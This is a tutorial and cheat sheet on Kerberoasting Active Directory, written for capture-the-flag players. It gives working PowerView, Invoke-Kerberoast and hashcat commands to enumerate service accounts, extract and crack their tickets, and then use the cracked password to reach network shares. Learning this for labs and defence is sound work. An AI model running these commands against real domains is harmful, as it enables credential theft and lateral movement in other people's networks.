Active Directory, a cornerstone of many networks, is riddled with complexities and nuances. It is these intricacies that give birth to vulnerabilities like Kerberoasting. This article aims to provide a detailed, hands-on guide to Kerberoasting for Capture The Flag (CTF) enthusiasts. Let it serve as a touchstone during your challenges.
Kerberos and SPNs
Kerberos
A stalwart authentication protocol in many AD environments, Kerberos operates based on tickets. These tickets vouch for user identities, ensuring secure communication without passwords being sent over the network.
Service Principal Names
An SPN uniquely identifies a service instance. When a service, like a SQL server, runs under an AD account, that account has its unique SPN. It’s these SPNs and their associated service accounts that become the targets of Kerberoasting.
Kerberoasting Demystified
Kerberoasting seeks to exploit the fact that service account tickets (associated with SPNs) are encrypted using the NTLM hash of the account’s password. The idea is simple: request these tickets, crack them offline, and obtain the plaintext password.
Setting the Stage – Toolkits:
- PowerView: A PowerShell tool to aid in AD enumeration.
- Invoke-Kerberoast: A PowerShell script for extracting Kerberos tickets.
- Hashcat: A potent password cracking tool.
Kerberoasting Cheat Sheet
Enumerate SPNs:
This is your first step. Identify potential service accounts:
# PowerView's way of listing SPNs
Import-Module .\PowerView.ps1
Get-NetUser | Where-Object { $_.serviceprincipalname }Extract Service Tickets:
# Using Invoke-Kerberoast to get the tickets
Invoke-Kerberoast -OutputFormat Hashcat | Format-List
This will yield ticket hashes, ripe for cracking.
Cracking the Tickets:
Armed with the ticket hashes, it’s time to bring Hashcat into play:
# Hashcat at work on the Kerberos tickets
hashcat -m 13100 -a 0 ticket_hashes.txt path_to_wordlist/wordlist.txt
The -m 13100 specifies the hash type (Kerberos TGS-REP etype 23) while -a 0 denotes a straight attack mode. Should you have rules for mutating potential passwords, integrate them for more advanced cracking attempts.
Advanced Cracking
- Optimized Wordlists: Tools like
CeWLcan generate custom wordlists from websites (often the company’s site) to identify potential password patterns. - Rules in Hashcat: Utilize rule-based attacks to generate mutations on wordlist entries, mimicking common password habits:
hashcat -m 13100 -a 0 -r path_to_rules/rule_file.rule ticket_hashes.txt path_to_wordlist/wordlist.txt
Access and Move
Successful cracking will grant you the plaintext password of the service account. Use this to access resources or as a stepping stone for lateral movement:
# Accessing resources with compromised credentials
net use \\target_IP\share_name /user:domain\serviceaccount_name password
Enhancements and Advanced Tactics
- Automating with CrackMapExec (CME): CME can automate Kerberoasting, streamlining the process. It also facilitates further actions once you’ve compromised an account.
- Time is Essence: Kerberos tickets can sometimes be time-sensitive. Ensure you’re cracking in an optimized environment to maximize speed. If using cloud-based platforms like AWS for cracking, be wary of costs!
- Defense against the Dark Arts – Understanding Protection Mechanisms: To best exploit, one must know the defenses. Techniques like enforcing strong password policies, frequent password rotations, and monitoring abnormal Kerberos traffic can hinder Kerberoasting.
In the Heat of CTF
During a CTF, time, precision, and speed are crucial. Keep these quick references handy:
Service Account Enumeration:
Get-NetUser | Where-Object { $_.serviceprincipalname }
Extracting Tickets:
Invoke-Kerberoast -OutputFormat Hashcat | Format-List
Hashcat Command:
hashcat -m 13100 -a 0 ticket_hashes.txt path_to_wordlist/wordlist.txt
Conclusion
Kerberoasting offers a fascinating insight into the delicate balance between protocol design and real-world security implications. While it’s a potent technique, always remember to act ethically and responsibly. The power of knowledge is best wielded with integrity.
